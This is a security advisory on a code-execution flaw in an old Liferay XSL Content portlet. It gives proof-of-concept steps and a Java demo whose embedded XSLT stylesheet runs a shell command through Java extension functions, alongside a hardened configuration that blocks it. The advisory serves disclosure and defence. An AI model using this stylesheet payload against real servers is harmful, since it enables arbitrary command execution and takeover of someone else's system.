Liferay 2: Users in your system could execute arbitrary code on your server

28 February 2018

The vulnerability described in this article has been fixed in Liferay's current release. We consider it extremely important to keep the systems you run up to date. The following article shows an example of a vulnerability in an outdated Liferay version.

The following example shows how a malicious user could compromise your server. This example requires the attacker to be logged in, but in other cases no login is required to run arbitrary code with the rights of the operating system user under which your portal instance runs. If you would like to secure your system, contact us.

XSL content portlet configuration (RCE)

Level of security risk: Critical

Details:
The XSL Content portlet lets anyone with permission to configure the portlet point it at any XML and XSL file, including a stylesheet hosted on a server the attacker controls. The portal fetches that stylesheet and evaluates it server-side, so whatever the XSLT engine allows a stylesheet to do, the attacker can do with the portal's privileges.
More details:
https://issues.liferay.com/browse/LPS-58018
https://issues.liferay.com/browse/LPE-4194
https://www.owasp.org/images/a/ae/OWASP_Switzerland_Meeting_2015-06-17_XSLT_SSRF_ENG.pdf

Risk:
An attacker could run arbitrary commands on the server and thereby gain access to the server itself.

Proof of concept:

1. Add the XSL Content portlet to a page.

2. Open Options > Configuration.

3. Change the XSL URL to the URL of a custom XSL file.

The content of the XSL file is the following:

4. After saving the changes, the portlet displays the result of the given command.
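The following Java program is an added example, not the stylesheet used in the original test and not Liferay code, that reproduces the mechanism behind this class of bug so you can verify your own XSLT configuration. It assumes the portal's XSLT engine is Xalan-J or the JDK's built-in XSLTC; both, unless told otherwise, let a stylesheet bind a namespace prefix to a Java class and call that class's methods as XPath functions. The constructed stylesheet runs `whoami` through java.lang.Runtime and returns its output, which is the effect step 4 describes. The hardened factory enables FEATURE_SECURE_PROCESSING, after which the same stylesheet is rejected at compile time and no command runs. The command name `whoami` and the class name `XslExtensionFunctionDemo` are this example's choices.

```java
import java.io.StringReader;
import java.io.StringWriter;
import javax.xml.XMLConstants;
import javax.xml.transform.Transformer;
import javax.xml.transform.TransformerConfigurationException;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.stream.StreamResult;
import javax.xml.transform.stream.StreamSource;

public class XslExtensionFunctionDemo {

    // Constructed stylesheet of the kind the proof of concept describes (not the
    // file used in the original test). Binding a prefix to
    // http://xml.apache.org/xalan/java/<class> is the Xalan/XSLTC extension
    // convention: the class's methods become callable XPath functions.
    static final String MALICIOUS_XSL =
        "<xsl:stylesheet version=\"1.0\""
      + " xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\""
      + " xmlns:rt=\"http://xml.apache.org/xalan/java/java.lang.Runtime\""
      + " xmlns:proc=\"http://xml.apache.org/xalan/java/java.lang.Process\""
      + " xmlns:scan=\"http://xml.apache.org/xalan/java/java.util.Scanner\">"
      + "<xsl:output method=\"text\"/>"
      + "<xsl:template match=\"/\">"
      // Runtime.getRuntime().exec("whoami"); the command is attacker-chosen.
      + "<xsl:variable name=\"p\" select=\"rt:exec(rt:getRuntime(), 'whoami')\"/>"
      // new Scanner(p.getInputStream()).useDelimiter("\\A") reads all of stdout.
      + "<xsl:variable name=\"s\" select=\"scan:useDelimiter(scan:new(proc:getInputStream($p)), '\\A')\"/>"
      + "<xsl:value-of select=\"scan:next($s)\"/>"
      + "</xsl:template>"
      + "</xsl:stylesheet>";

    // A factory configured the way a portlet that evaluates user-supplied XSL should
    // configure it.
    static TransformerFactory hardenedFactory() throws TransformerConfigurationException {
        TransformerFactory f = TransformerFactory.newInstance();
        // Secure processing disables extension functions, i.e. the code-execution path.
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // Also refuse external DTDs and fetched stylesheets (xsl:import, xsl:include,
        // document()), the SSRF and file-read path from the OWASP reference above.
        // Older standalone Xalan builds do not recognise these attributes and throw.
        try {
            f.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
            f.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
        } catch (IllegalArgumentException e) {
            System.err.println("processor ignores ACCESS_EXTERNAL_*: " + e.getMessage());
        }
        return f;
    }

    // Compiles the stylesheet and applies it to the XML; returns the text output.
    static String transform(TransformerFactory f, String xsl, String xml) throws Exception {
        Transformer t = f.newTransformer(new StreamSource(new StringReader(xsl)));
        StringWriter out = new StringWriter();
        t.transform(new StreamSource(new StringReader(xml)), new StreamResult(out));
        return out.toString();
    }

    public static void main(String[] args) throws Exception {
        String xml = "<root/>"; // the XML input plays no part in the payload

        // Default factory: on an engine that allows extension functions the output
        // is the stdout of `whoami` on the machine running this program.
        try {
            System.out.println("default factory: "
                + transform(TransformerFactory.newInstance(), MALICIOUS_XSL, xml));
        } catch (Exception e) {
            System.out.println("default factory rejected stylesheet: " + e.getMessage());
        }

        // Hardened factory: compiling the stylesheet fails, so no command runs.
        try {
            System.out.println("hardened factory: "
                + transform(hardenedFactory(), MALICIOUS_XSL, xml));
        } catch (Exception e) {
            System.out.println("hardened factory rejected stylesheet: " + e.getMessage());
        }
    }
}
```

Compile and run with `javac XslExtensionFunctionDemo.java && java XslExtensionFunctionDemo` to exercise the JDK's XSLTC; to test the Xalan-J build a portal bundles, put its xalan.jar on the classpath so that `TransformerFactory.newInstance()` picks it up. Whether the first branch prints a user name depends on the engine and JDK version in use; the second branch should always report a rejection. In the portlet, the stylesheet is not inlined like this but fetched from the configured URL, which is why hosting the file on an attacker-controlled server is enough.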